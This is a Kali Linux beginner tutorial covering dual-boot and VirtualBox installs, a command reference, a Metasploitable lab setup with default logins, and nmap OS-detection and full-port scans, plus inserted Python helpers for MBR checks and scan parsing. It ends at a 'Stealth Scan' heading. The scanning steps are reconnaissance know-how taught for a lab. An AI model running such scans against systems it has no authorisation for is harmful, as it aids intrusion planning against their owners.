Kali Linux Tutorial

Kali Linux is one of the best open-source security packages for an ethical hacker, containing a set of tools divided by category. Kali Linux can be installed on a machine as an operating system, which is discussed in this tutorial. Installing Kali Linux is a practical option as it provides more options to work with and combine the tools.

This tutorial gives a complete understanding on Kali Linux and explains how to use it in practice.

Audience

This tutorial has been prepared for beginners to help them understand the fundamentals of Kali Linux. It will specifically be useful for penetration testing professionals. After completing this tutorial, you will find yourself at a moderate level of expertise from where you can take yourself to the next levels.

Prerequisites

Although this tutorial will benefit most of the beginners, it will definitely be a plus if you are familiar with the basic concepts of any Linux operating system.

Kali Linux is one of the best security packages for an ethical hacker, containing a set of tools divided by category. It is open source and its official webpage is https://www.kali.org.

Generally, Kali Linux can be installed on a machine as an operating system or as a virtual machine, which we will discuss in the following section. Installing Kali Linux is a practical option as it provides more options to work with and combine the tools. You can also create a live boot CD or USB. All of this can be found at the following link: https://www.kali.org/downloads/

BackTrack was the old version of Kali Linux distribution. The latest release is Kali 2020.3 and it is updated very often.

Linux Distribution

To install Kali Linux −

Dual Boot Kali with Windows

Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.

In our example, we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Installation Prerequisites

This guide will make the following assumptions:

We need to use a different image from the single boot Kali Linux install guide, as we need the live image. This is because we need to edit the disk structure without mounting any partitions, otherwise it would be in-use. After we have finished altering the disk, we can install Kali Linux with either:

  • The same live image, and after installation and the setup is complete, switch (or remove) the desktop environment, and/or change any metapackages.
  • Switch to the installer image (by using multiple CD/DVD/USBs or re-imaging the same medium), and then continue the single boot guide exactly as before.

This installation has the potential to go wrong very easily as it involves editing existing partitions. Be aware of what partitions you are modifying and where you are installing Kali Linux to.
Having a backup of your Windows files available is a good idea in the event something goes wrong.

Resize Windows Procedure

  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Select Live, and you should be booted into the Kali Linux default desktop.
  2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.

  3. Select your Windows partition (/dev/sda2) and resize it, leaving enough space (we recommend at least 20 GB) for the Kali Linux installation.

Depending on your setup, it is often the second, larger partition. In our example, there are three partitions:

  • Windows boot partition (/dev/sda1)
  • Windows main operating system itself (/dev/sda2)
  • Windows System Recovery partition (/dev/sda3)

If you drag past any non-white area of the partition, you are editing a section that is in use.
Only remove space from the area of the partition that is not in use.
It is alright to leave the third partition (/dev/sda3) and only shrink the actual install (/dev/sda2).

If you wish to organize the partition to group all the Windows partitions together, placing the free space at the end, you may do so.

  4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.


Kali Linux Installation Procedure

  1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install, until the point of the partitioning, where you need to select “Guided – use the largest continuous free space” that you created earlier with gparted.

  2. Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali Linux or Windows.


Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your system.

The General Use section has more information and you can also find tips on how to get the most out of Kali in our User Forums.

One thing that may be worth knowing about is that occasionally the time will get changed between the Windows and the Linux system. To fix this, we can do the following:

kali@kali:~$ timedatectl set-local-rtc 1 --adjust-system-clock
kali@kali:~$

To undo this we can simply do:

kali@kali:~$ timedatectl set-local-rtc 0 --adjust-system-clock
kali@kali:~$

To install Kali Linux as a virtual machine instead, we will proceed in two stages −

  • First, we will download the Virtual Box and install it.
  • Later, we will download and install the Kali Linux distribution.

Download and Install the Virtual Box

A Virtual Box is particularly useful when you want to test something on Kali Linux that you are unsure of. Running Kali Linux in a Virtual Box is safe when you want to experiment with unknown packages or when you want to test some code.

With the help of a Virtual Box, you can install Kali Linux on your system (not directly on your hard disk) alongside your primary OS, which can be macOS, Windows or another flavor of Linux.

Let’s understand how you can download and install the Virtual Box on your system.

Step 1 − To download, go to https://www.virtualbox.org/wiki/Downloads. Depending on your operating system, select the right package. In this case, it will be the first one for Windows as shown in the following screenshot.

[Screenshot: Virtual Box First Page]

Step 2 − Click Next.

[Screenshot: Virtual Box setup]

Step 3 − The next page will give you options to choose the location where you want to install the application. In this case, let us leave it as default and click Next.

[Screenshot: Custom Setup]

Step 4 − Click Next and the following Custom Setup screenshot pops up. Select the features you want to be installed and click Next.

[Screenshot: Custom Features]

Step 5 − Click Yes to proceed with the installation.

[Screenshot: Network Interface]

Step 6 − The Ready to Install screen pops up. Click Install.

[Screenshot: Ready to Install]

Step 7 − Click the Finish button.

[Screenshot: Complete Installation]

The Virtual Box application will now open as shown in the following screenshot. We are now ready to install the remaining hosts used in this manual; this setup is also recommended for professional usage.

[Screenshot: Welcome to VirtualBox]

Install Kali Linux

Now that we have successfully installed the Virtual Box, let’s move on to the next step and install Kali Linux.

Step 1 − Download the Kali Linux package from its official website: https://www.kali.org/downloads/

[Screenshot: Kali Linux image download]

Step 2 − Click VirtualBox → New as shown in the following screenshot.

[Screenshot: Machine → New]

Step 3 − Choose the right virtual hard disk file and click Open.

[Screenshot: Virtual hard disk file]

Step 4 − The following screenshot pops up. Click the Create button.

[Screenshot: Create]

Step 5 − Start Kali OS. The default username is root and the password is toor.

[Screenshot: Kali booted]

Dual Boot Kali on Mac Hardware

IMPORTANT! Some newer Macs do not run Linux well, or at all. Please check whether your Mac can run Linux before attempting this.

Kali Linux Installation Requirements

Since the release of Kali Linux 1.0.8, Kali Linux supports EFI out of the box. This added feature simplifies the process of getting Kali installed and running on various Apple MacBook Air, Pro, and Retina models.

The make/model/year of the device will determine how successful your experience will be, with newer devices having a better chance of working. Pre-installing rEFInd may also increase the odds of success on older devices.

This guide will show you how to dual-boot OSX with Kali Linux using rEFInd, with the option of encrypting the Kali Linux partition. If you wish to replace OSX completely, please refer to our Single Boot Kali on Mac Hardware guide.

By using the 3rd party software rEFInd (a fork of rEFIt) we are able to open up the boot menu used in Apple’s OSX, which is perfect for dual booting. It also has the advantage of helping older devices boot from USB that would not be able to otherwise. Once Kali Linux has been installed, rEFInd can be customized to be hidden or removed completely.

Installation Prerequisites

  • A minimum of 20 GB disk space for the Kali Linux install.
  • A minimum of 1 GB RAM. 2 GB or more recommended.
  • Devices older than ‘late 2012’ may require a blank DVD. USB booting may not work without rEFInd pre-installed.
  • For devices newer than ‘late 2012’, you’ll need a blank DVD or a USB drive.
  • OSX 10.7 or higher

Preparing for the Installation

  1. Download Kali Linux.
  2. Burn the Kali Linux ISO image to a DVD or copy the image to USB drive.
  3. Backup any important information on the device to external media.

Preparing OSX (Installing rEFInd)

  1. At the time of this writing, the latest version of rEFInd is 0.8.3. Boot into OSX and download a local copy.
osx:~ mbp$ curl -s -L http://sourceforge.net/projects/refind/files/0.8.3/refind-bin-0.8.3.zip -o refind.zip
  2. After downloading rEFInd, extract the contents of the zip file and run the install shell script with sudo.
osx:~ mbp$ unzip -q refind.zip
osx:~ mbp$ cd refind-bin-*/
osx:refind-bin-0.8.3 mbp$ sudo bash install.sh

WARNING: Improper use of the sudo command could lead to data loss
or the deletion of important system files. Please double-check your
typing when using sudo. Type "man sudo" for more information.

To proceed, enter your password, or type Ctrl-C to abort.

Password:
Installing rEFInd on OS X....
Installing rEFInd to the partition mounted at //
Copied rEFInd binary files

Copying sample configuration file as refind.conf; edit this file to configure
rEFInd.

WARNING: If you have an Advanced Format disk, *DO NOT* attempt to check the
bless status with 'bless --info', since this is known to cause disk corruption
on some systems!!

Installation has completed successfully.

osx:refind-bin-0.8.3 mbp$

Kali Linux Partitioning Procedure

  1. Before we can install Kali Linux, there needs to be room on the hard disk. By booting into a live Kali session, we can resize the partition to our desired size. To do so, power on the device and immediately press and hold the Option key until you see the rEFInd boot menu.

  2. When the boot menu appears, insert your chosen installation medium. If everything works as expected, you will see two volumes:

  • EFI – EFI\BOOT\syslinux.efi from 61 MiB FAT volume
  • Windows – Legacy OS from FAT volume

Although Kali Linux is based on Debian, Apple/rEFInd detects it as Windows. Select the Windows volume to continue.

  • If you are using a DVD, you may need to refresh the menu by pressing ESC once the disk is fully spinning.
  • If you still only see one volume (EFI), then the installation medium is not supported for your Apple device. If you haven’t already done so, you may wish to install rEFInd and try again.
  • If you select the EFI volume, the booting will hang at this point and you will not be able to continue.

  3. You should be greeted with the Kali Boot screen. Select Live and you should be booted into the Kali Linux default desktop.

  4. We can use GParted to shrink the existing OSX partition (HFS+), allowing us to install Kali in the free space. You can find GParted in the Kali menu by navigating to: Applications -> System Tools -> GParted Partition Editor

  5. Once GParted has opened, select your OSX partition. Depending on your system, it will usually be the second, larger partition. In our example, there are three partitions: the EFI upgrade partition (/dev/sda1), OSX (/dev/sda2), and System Recovery (/dev/sda3). Resize your OSX partition and leave enough space (20 GB minimum) for the Kali installation.


Kali Linux Installation Procedure

  1. To start the Kali Linux installation, repeat steps 1 and 2 above to boot to the Kali Linux boot screen. Once you can see the boot screen, choose ‘Live’, ‘Graphical Install’ or ‘(Text-Mode) Install’ to begin the setup. In this guide, we chose ‘Graphical Install’.

  2. Select your preferred language and then your country location. You’ll also be prompted to configure your keyboard with the appropriate keymap.

  3. The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a hostname and then a domain name for your system. In the example below, we’ve entered ‘kali’ as our hostname.

  • If the setup detected multiple NICs, it may prompt you which one to use for installation.
  • If the chosen NIC is 802.11 based, it will ask for wireless network information to collect, before prompting for a hostname.
  • If there isn’t a DHCP service running on the network, it will ask you to manually enter the network information after probing for network interfaces.
  • If Kali Linux doesn’t detect your NIC, you either need to include the drivers for it when prompted, or generate a custom Kali Linux ISO with them pre-included.

  4. Enter a robust password for the root account.

  5. Next, set your time zone.

  6. The installer will now probe your disks and offer you five choices. In our example, we’re using the spare partition that we made during live mode, so we select ‘Guided – use the largest continuous free space’.

  • Experienced users can use the ‘Manual’ option for more granular configuration options. This option will also allow you to set up encrypted LVM, so Kali Linux would be fully encrypted. The screen afterwards will prompt you for the password. You will have to enter the same password every time you start up Kali Linux.

Kali will automatically securely wipe the hard disk before asking for the password. This may take ‘a while’ (hours) depending on size and speed of the drive. If you wish to risk it, you can skip it.

  7. The next stage is to select the partition structure you want to use. We will go ahead and use the default option and have everything on one partition. Afterwards it will display an overview. If you agree to what it suggests, press the continue button.

  8. Next, you’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation.

  9. This screen configures the use of our Internet network mirrors. Kali can use our online central repository to distribute applications to keep packages up-to-date and allow for additional programs to be installed more easily. Should you need to enter any appropriate proxy information, the next screen will allow you to enter the required details.

If you select ‘NO’ in this screen, you will NOT be able to install packages from Kali repositories until you alter your sources.

  10. Next, install the GRUB bootloader.

  11. Finally, click ‘Continue’ to finish installing Kali Linux. It is highly recommended that you restart your machine at this stage. Once complete, repeat the first 2 steps again to boot into ‘Live mode’ once more.

  12. If the gdisk package isn’t included in your Kali Linux ISO, you will first need to install it. If you enabled the network repository during the setup, this can easily be done:

apt update
apt install -y gdisk
  13. We are now going to convert the Master Boot Record (MBR) to a hybrid, which will allow Apple’s EFI to detect and boot using GRUB. Once complete, power off the device and remove any installation media when prompted.
root@kali:~# gdisk /dev/sda
GPT fdisk (gdisk) version 0.8.5

Partition table scan:
MBR: protective
BSD: not present
APM: not present
GPT: present

Found valid GPT with protective MBR; using GPT.

Command (? for help): p
Disk /dev/sda: 976773168 sectors, 465.8 GiB
Logical sector size: 512 bytes
Disk identifier (GUID): 1B3DB3D4-ECFD-47A1-9435-F2FF318C2F55
Partition table holds up to 128 entries
First usable sector is 34, last usable sector is 976773134
Partitions will be aligned on 8-sector boundaries
Total free space is 245 sectors (122.5 KiB)

Number Start (sector) End (sector) Size Code Name
1 40 409639 200.0 MiB EF00 EFI System Partition
2 409640 548413439 261.3 GiB AF00 Macintosh
3 975503592 976773127 619.9 MiB AB00 Recovery HD
4 548413440 548415487 1024.0 KiB EF02
5 548415488 958138367 195.4 GiB 0700
6 958138368 975503359 8.3 GiB 8200

Command (? for help): r

Recovery/transformation command (? for help): h

WARNING! Hybrid MBRs are flaky and dangerous! If you decide not to use one,
just hit the Enter key at the below prompt and your MBR partition table will
be untouched.

Type from one to three GPT partition numbers, separated by spaces, to be
added to the hybrid MBR, in sequence: 5
Place EFI GPT (0xEE) partition first in MBR (good for GRUB)? (Y/N): y

Creating entry for GPT partition #5 (MBR partition #2)
Enter an MBR hex code (default 07): 83
Set the bootable flag? (Y/N): y

Unused partition space(s) found. Use one to protect more partitions? (Y/N): n

Recovery/transformation command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): y
OK; writing new GUID partition table (GPT) to /dev/sda.
The operation has completed successfully.
root@kali:~#
  14. At this stage, we are able to use both Kali Linux and OSX and select which one we want to use at start up.
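To verify what the gdisk session above actually wrote, and to tell a protective MBR apart from a hybrid one (the same check a defender runs when auditing boot-record integrity), here is an added example that is not part of the original guide or of gdisk itself: it decodes the four MBR partition entries in sector 0 and classifies the table. The two sample sectors are constructed inline to match the partition numbers in the gdisk listing above; the device path argument and the helper names are assumptions.

```python
import struct
import sys

MBR_SIZE = 512
ENTRY_OFFSET = 446          # the four 16-byte partition entries start here
ENTRY_FORMAT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count
GPT_PROTECTIVE = 0xEE       # type code of the "EFI GPT" entry gdisk places first
LINUX_NATIVE = 0x83         # the hex code typed at the "Enter an MBR hex code" prompt


def parse_mbr(sector0: bytes) -> list:
    """Decode the MBR partition table; returns one dict per non-empty entry."""
    if len(sector0) < MBR_SIZE:
        raise ValueError("sector 0 must be at least 512 bytes")
    if sector0[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature: not an MBR")
    entries = []
    for i in range(4):
        off = ENTRY_OFFSET + i * 16
        status, _, ptype, _, lba_start, count = struct.unpack(ENTRY_FORMAT, sector0[off:off + 16])
        if ptype == 0 and count == 0:
            continue  # unused slot
        entries.append({"slot": i + 1, "bootable": bool(status & 0x80),
                        "type": ptype, "lba_start": lba_start, "sectors": count})
    return entries


def classify_mbr(entries: list) -> str:
    """'protective' = GPT marker only, 'hybrid' = GPT marker plus real entries, 'legacy' = no marker."""
    types = [e["type"] for e in entries]
    if GPT_PROTECTIVE not in types:
        return "legacy"
    return "protective" if len(entries) == 1 else "hybrid"


def build_mbr(entries: list) -> bytes:
    """Build a 512-byte sector from entry dicts (used only for the constructed samples)."""
    buf = bytearray(MBR_SIZE)
    for i, e in enumerate(entries):
        off = ENTRY_OFFSET + i * 16
        buf[off:off + 16] = struct.pack(ENTRY_FORMAT, 0x80 if e["bootable"] else 0x00,
                                        b"\xff\xff\xff", e["type"], b"\xff\xff\xff",
                                        e["lba_start"], e["sectors"])
    buf[510:512] = b"\x55\xaa"
    return bytes(buf)


# Constructed samples. Sector numbers follow the gdisk "p" listing above:
# GPT partition 5 (code 0700, the Kali root) spans sectors 548415488..958138367.
DISK_SECTORS = 976773168
PROTECTIVE_SAMPLE = [
    {"bootable": False, "type": GPT_PROTECTIVE, "lba_start": 1, "sectors": DISK_SECTORS - 1},
]
HYBRID_SAMPLE = [
    # "Place EFI GPT (0xEE) partition first": covers everything up to the hybridized partition
    {"bootable": False, "type": GPT_PROTECTIVE, "lba_start": 1, "sectors": 548415488 - 1},
    # GPT partition #5 exposed as MBR partition #2, type 83, bootable flag set
    {"bootable": True, "type": LINUX_NATIVE, "lba_start": 548415488,
     "sectors": 958138367 - 548415488 + 1},
]


def check_device(path: str) -> str:
    """Read sector 0 of a block device (e.g. /dev/sda, needs root) and classify its MBR."""
    with open(path, "rb") as dev:
        return classify_mbr(parse_mbr(dev.read(MBR_SIZE)))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", check_device(sys.argv[1]))
    else:
        for name, sample in (("protective", PROTECTIVE_SAMPLE), ("hybrid", HYBRID_SAMPLE)):
            sector = build_mbr(sample)
            print(name, "->", classify_mbr(parse_mbr(sector)), parse_mbr(sector))
```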

rEFInd Configuration

If you wish, you can alter rEFInd in various ways now, including:

  • The default OS selection (by default it is OSX)
  • Timeout value (by default it is 20 seconds)
  • Direct boot into the default OS (Note, by pressing Options during boot, you will have a one time boot menu)
  • Remove rEFInd, enabling the use of the traditional Apple menu (booting to OSX and Kali Linux will still work)

If you wish to make any of these alterations, boot into OSX, and alter the following file:

osx:~ mbp$ sudo nano /EFI/refind/refind.conf
  • The timeout value controls how long you have to select an OS from the boot menu. By setting it to ‘-1’, it will boot directly into the default OS.
  • The ‘default_selection’ value sets the default selection on startup. OSX will be at position ‘1’ and Kali will be at ‘2’. In this example, we will use OSX as the default.
  • If we combine the two alterations and save our changes, the next time we reboot, it will appear that nothing has changed from before installing Kali Linux. However, if we hold down the ‘Options’ key for the Apple boot menu, we will see the following:
    • EFI Boot – OSX
    • Windows – Kali Linux
    • Recovery HD – OSX’s Recovery Partition

Using Apple’s boot menu, the value names cannot be altered. If you wish to customize these values, you will need to use rEFInd.


Important A-Z Kali Linux Commands

Command – Function
A
 apropos Search Help manual pages (man -k)
 apt-get Search for and install software packages (Debian)
 aptitude Search for and install software packages (Debian)
 aspell Spell Checker
 awk Find and Replace text, database sort/validate/index
B
 basename Strip directory and suffix from filenames
 bash GNU Bourne-Again Shell
 bc Arbitrary precision calculator language
 bg Send to background
 break Exit from a loop
 builtin Run a shell builtin
 bzip2 Compress or decompress named files
C
 cal Display a calendar
 case Conditionally perform a command
 cat Concatenate and print (display) the content of files
 cd Change Directory
 cfdisk Partition table manipulator for Linux
 chgrp Change group ownership
 chmod Change access permissions
 chown Change file owner and group
 chroot Run a command with a different root directory
 chkconfig System services (runlevel)
 cksum Print CRC checksum and byte counts
 clear Clear terminal screen
 cmp Compare two files
 comm Compare two sorted files line by line
 command Run a command – ignoring shell functions
 continue Resume the next iteration of a loop
 cp Copy one or more files to another location
 cron Daemon to execute scheduled commands
 crontab Schedule a command to run at a later time
 csplit Split a file into context-determined pieces
 cut Divide a file into several parts
D
 date Display or change the date and time
 dc Desk Calculator
 dd Convert and copy a file, write disk headers, boot records
 ddrescue Data recovery tool
 declare Declare variables and give them attributes
 df Display free disk space
 diff Display the differences between two files
 diff3 Show differences among three files
 dig DNS lookup
 dir Briefly list directory contents
 dircolors Colour setup for `ls’
 dirname Convert a full pathname to just a path
 dirs Display list of remembered directories
 dmesg Print kernel & driver messages
 du Estimate file space usage
E
 echo Display message on screen
 egrep Search files for lines that match an extended expression
 eject Eject removable media
 enable Enable and disable builtin shell commands
 env Environment variables
 ethtool Ethernet card settings
 eval Evaluate several commands/arguments
 exec Execute a command
 exit Exit the shell
 expect Automate arbitrary applications accessed over a terminal
 expand Convert tabs to spaces
 export Set an environment variable
 expr Evaluate expressions
F
 false Do nothing, unsuccessfully
 fdformat Low-level format a floppy disk
 fdisk Partition table manipulator for Linux
 fg Send job to foreground
 fgrep Search files for lines that match a fixed string
 file Determine file type
 find Search for files that meet a desired criteria
 fmt Reformat paragraph text
 fold Wrap text to fit a specified width
 for Expand words, and execute commands
 format Format disks or tapes
 free Display memory usage
 fsck File system consistency check and repair
 ftp File Transfer Protocol
 function Define Function Macros
 fuser Identify/kill the process that is accessing a file
G
 gawk Find and Replace text within files
 getopts Parse positional parameters
 grep Search files for lines that match a given pattern
 groupadd Add a user security group
 groupdel Delete a group
 groupmod Modify a group
 groups Print group names a user is in
 gzip Compress or decompress named files
H
 hash Remember the full pathname of a name argument
 head Output the first part of files
 help Display help for a built-in command
 history Command History
 hostname Print or set system name
I
 iconv Convert the character set of a file
 id Print user and group id’s
 if Conditionally perform a command
 ifconfig Configure a network interface
 ifdown Stop a network interface
 ifup Start a network interface up
 import Capture an X server screen and save the image to file
 install Copy files and set attributes
J
 jobs List active jobs
 join Join lines on a common field
K
 kill Stop a process from running
 killall Kill processes by name
L
 less Display output one screen at a time
 let Perform arithmetic on shell variables
 ln Create a symbolic link to a file
 local Create variables
 locate Find files
 logname Print current login name
 logout Exit a login shell
 look Display lines beginning with a given string
 lpc Line printer control program
 lpr Off line print
 lprint Print a file
 lprintd Abort a print job
 lprintq List the print queue
 lprm Remove jobs from the print queue
 ls List information about files
 lsof List open files
M
 make Recompile a group of programs
 man Help manual
 mkdir Create new folders
 mkfifo Make FIFOs (named pipes)
 mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
 mknod Make block or character special files
 more Display output one screen at a time
 mount Mount a file system
 mtools Manipulate MS-DOS files
 mtr Network diagnostics (traceroute/ping)
 mv Move or rename files or directories
 mmv Mass Move and rename files
N
 netstat Networking information
 nice Set the priority of a command or job
 nl Number lines and write files
 nohup Run a command immune to hangups
 notify-send Send desktop notifications
 nslookup Query Internet name servers interactively
O
 open Open a file in its default application
 op Operator access
P
 passwd Modify a user password
 paste Merge lines of files
 pathchk Check file name portability
 ping Test a network connection
 pkill Stop processes from running
 popd Restore the previous value of the current directory
 pr Prepare files for printing
 printcap Printer capability database
 printenv Print environment variables
 printf Format and print data
 ps Process status
 pushd Save and then change the current directory
 pwd Print Working Directory
Q
 quota Display disk usage and limits
 quotacheck Scan a file system for disk usage
 quotactl Set disk quotas
R
 ram ram disk device
 rcp Copy files between two machines
 read Read a line from standard input
 readarray Read from stdin into an array variable
 readonly Mark variables/functions as readonly
 reboot Reboot the system
 rename Rename files
 renice Alter priority of running processes
 remsync Synchronize remote files via email
 return Exit a shell function
 rev Reverse lines of a file
 rm Remove files
 rmdir Remove folders
 rsync Remote file copy (Synchronize file trees)
S
 screen Multiplex terminal, run remote shells via ssh
 scp Secure copy (remote file copy)
 sdiff Merge two files interactively
 sed Stream Editor
 select Accept keyboard input
 seq Print numeric sequences
 set Manipulate shell variables and functions
 sftp Secure File Transfer Program
 shift Shift positional parameters
 shopt Shell Options
 shutdown Shutdown or restart linux
 sleep Delay for a specified time
 slocate Find files
 sort Sort text files
 source Run commands from a file
 split Split a file into fixed-size pieces
 ssh Secure Shell client (remote login program)
 strace Trace system calls and signals
 su Substitute user identity
 sudo Execute a command as another user
 sum Print a checksum for a file
 suspend Suspend execution of this shell
 symlink Make a new name for a file
 sync Synchronize data on disk with memory
T
 tail Output the last part of file
 tar Tape Archiver
 tee Redirect output to multiple files
 test Evaluate a conditional expression
 time Measure Program running time
 times User and system times
 touch Change file timestamps
 top List processes running on the system
 traceroute Trace Route to Host
 trap Run a command when a signal is set(bourne)
 tr Translate, squeeze, and/or delete characters
 true Do nothing, successfully
 tsort Topological sort
 tty Print filename of terminal on stdin
 type Describe a command
U
 ulimit Limit user resources
 umask Users file creation mask
 umount Unmount a device
 unalias Remove an alias
 uname Print system information
 unexpand Convert spaces to tabs
 uniq Uniquify files
 units Convert units from one scale to another
 unset Remove variable or function names
 unshar Unpack shell archive scripts
 until Execute commands (until error)
 uptime Show uptime
 useradd Create new user account
 usermod Modify user account
 users List users currently logged in
 uuencode Encode a binary file
 uudecode Decode a file created by uuencode
V
 v Verbosely list directory contents (`ls -l -b’)
 vdir Verbosely list directory contents (`ls -l -b’)
 vi Text Editor
 vmstat Report virtual memory statistics
W
 wait Wait for a process to complete
 watch Execute/display a program periodically
 wc Print byte, word, and line counts
 whereis Search the user’s $path, man pages and source files for a program
 which Search the user’s $path for a program file
 while Execute commands
 who Print all usernames currently logged in
 whoami Print the current user id and name (`id -un’)
 wget Retrieve web pages or files via HTTP, HTTPS or FTP
 write Send a message to another user
X
 xargs Execute utility, passing constructed argument lists
 xdg-open Open a file or URL in the user’s preferred application

Update Kali

It is important to keep updating Kali Linux and its tools to the new versions, to remain functional. Following are the steps to update Kali.

Step 1 − Go to Application → Terminal. Then, type “apt-get update” and the update will take place as shown in the following screenshot.

[Screenshot: Application menu]
[Screenshot: Terminal]

Step 2 − Now to upgrade the tools, type “apt-get upgrade” and the new packages will be downloaded.

[Screenshot: Upgrade]

Step 3 − It will ask if you want to continue. Type “Y” and “Enter”.

[Screenshot: Enter Y to continue]

Step 4 − To upgrade to a newer version of the operating system, type “apt-get dist-upgrade”.

[Screenshot: Dist Upgrade]

Laboratory Setup

In this section, we will set up another testing machine to perform the tests with the help of tools of Kali Linux.

Step 1 − Download Metasploitable, which is a Linux machine. It can be downloaded from the official webpage of Rapid7: https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web

[Screenshot: Metasploitable download page]

Step 2 − Register by supplying your details. After filling the above form, we can download the software.

[Screenshot: Rapid7 registration form]

Step 3 − Click VirtualBox → New.

[Screenshot: Machine → New]

Step 4 − Click “Use an existing virtual hard disk file”. Browse the file where you have downloaded Metasploitable and click Open.

[Screenshot: Existing Hard Disk]

Step 5 − A screen to create a virtual machine pops up. Click “Create”.

[Screenshot: Select main memory size]

The default username is msfadmin and the password is msfadmin.

[Screenshot: Metasploitable login]

In this chapter, we will discuss the information gathering tools of Kali Linux.

NMAP and ZenMAP

NMAP and ZenMAP are useful tools for the scanning phase of Ethical Hacking in Kali Linux. NMAP and ZenMAP are practically the same tool, however NMAP uses command line while ZenMAP has a GUI.

NMAP is a free utility tool for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

NMAP uses raw IP packets in novel ways to determine which hosts are available on the network, what services (application name and version) those hosts are offering, which operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, etc.

Now, let’s go step by step and learn how to use NMAP and ZenMAP.

Step 1 − To open, go to Applications → 01-Information Gathering → nmap or zenmap.

[Screenshot: Nmap / ZenMap in the menu]

Step 2 − The next step is to detect the OS type/version of the target host. Based on the help shown by NMAP, the option for OS type/version detection is “-O”. For more information, use this link: https://nmap.org/book/man-os-detection.html

The command that we will use is −

nmap -O 192.168.1.101

The following screenshot shows where you need to type the above command to see the Nmap output −

Nmap Output
TCP UDP port

Step 3 − Next, open the TCP and UDP ports. To scan all the TCP ports based on NMAP, use the following command −

nmap -p 1-65535 -T4  192.168.1.101 

Where the parameter “–p” indicates all the TCP ports that have to be scanned. In this case, we are scanning all the ports and “-T4” is the speed of scanning at which NMAP has to run.

Following are the results. In green are all the TCP open ports and in red are all the closed ports. However, NMAP does not show as the list is too long.

Closed Ports
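Scripting the scan: the following is an added example (not part of the original tutorial and not code from the Nmap project). It builds the nmap command lines used above with the machine-readable -oG output format, parses that output, and diffs two scans so that a newly opened port stands out, which is what the service-upgrade and uptime-monitoring uses of NMAP mentioned earlier come down to. The two scan outputs are constructed for the example, and the target address and port list are assumptions.

```python
import shlex
import subprocess
from typing import Dict, List, Tuple

# Constructed sample of nmap's grepable (-oG) output, in the layout nmap writes; not a real scan result.
SAMPLE_BASELINE = (
    "# Nmap 7.80 scan initiated as: nmap -sS -p- -T4 -oG - 192.168.1.101\n"
    "Host: 192.168.1.101 ()\tStatus: Up\n"
    "Host: 192.168.1.101 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, "
    "80/open/tcp//http///\tIgnored State: closed (65532)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 10.42 seconds\n"
)
SAMPLE_LATER = (
    "Host: 192.168.1.101 ()\tStatus: Up\n"
    "Host: 192.168.1.101 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, "
    "80/open/tcp//http///, 3306/open/tcp//mysql///, 8080/filtered/tcp//http-proxy///"
    "\tIgnored State: closed (65530)\n"
)

Port = Tuple[int, str, str, str]  # (port number, state, protocol, service name)


def nmap_command(target: str, full_tcp: bool = True, os_detect: bool = False) -> List[str]:
    """Argument vector for the scans used in this chapter.

    -sS needs root (raw sockets), -p- is shorthand for -p 1-65535 and
    -oG - writes the grepable format to stdout so a script can parse it.
    """
    argv = ["nmap", "-sS", "-T4", "-oG", "-"]
    if full_tcp:
        argv.append("-p-")
    if os_detect:
        argv.append("-O")
    argv.append(target)
    return argv


def parse_grepable(text: str) -> Dict[str, List[Port]]:
    """Map each host to its (port, state, proto, service) tuples.

    A -oG "Ports:" field is a comma-separated list of
    port/state/proto/owner/service/rpcinfo/version/ entries.
    """
    hosts: Dict[str, List[Port]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5 or not fields[0].isdigit():
                continue
            hosts.setdefault(host, []).append((int(fields[0]), fields[1], fields[2], fields[4]))
    return hosts


def open_ports(text: str, host: str) -> List[int]:
    """Only the ports reported open; 'filtered' ones need a closer look, not an alert."""
    return sorted(p for p, state, _, _ in parse_grepable(text).get(host, []) if state == "open")


def new_open_ports(baseline: str, later: str, host: str) -> List[int]:
    """Ports open in the later scan but not in the baseline: the change a periodic scan should flag."""
    return sorted(set(open_ports(later, host)) - set(open_ports(baseline, host)))


def run_scan(target: str) -> str:
    """Run the real scan and return its grepable output (needs nmap and root; not called below)."""
    return subprocess.run(nmap_command(target), capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    print(" ".join(shlex.quote(a) for a in nmap_command("192.168.1.101", os_detect=True)))
    print("open now:", open_ports(SAMPLE_LATER, "192.168.1.101"))
    print("newly open since baseline:", new_open_ports(SAMPLE_BASELINE, SAMPLE_LATER, "192.168.1.101"))
```

Run as root with nmap installed, run_scan() returns output in exactly this shape; parsing -oG (or the XML from -oX) is far more robust than scraping the human-readable default output, whose layout changes between versions.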

Stealth Scan

